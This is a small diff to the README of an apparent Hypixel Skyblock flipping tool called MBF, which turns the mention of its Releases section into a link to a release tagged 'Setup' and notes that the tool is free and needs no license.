weldtrailclaim/mbf-flipper-skyblock/README.md

 ## 📥 Download & Setup
 MBF is completely **free to use**.

-You can download the latest ready-to-run version directly from the **Releases** section.
+You can download the latest ready-to-run version directly from the [https://github.com/weldtrailclaim/mbf-flipper-skyblock/releases/tag/Setup](**Releases**) section.
 No license keys, hardware binding, or subscriptions are required.

 ---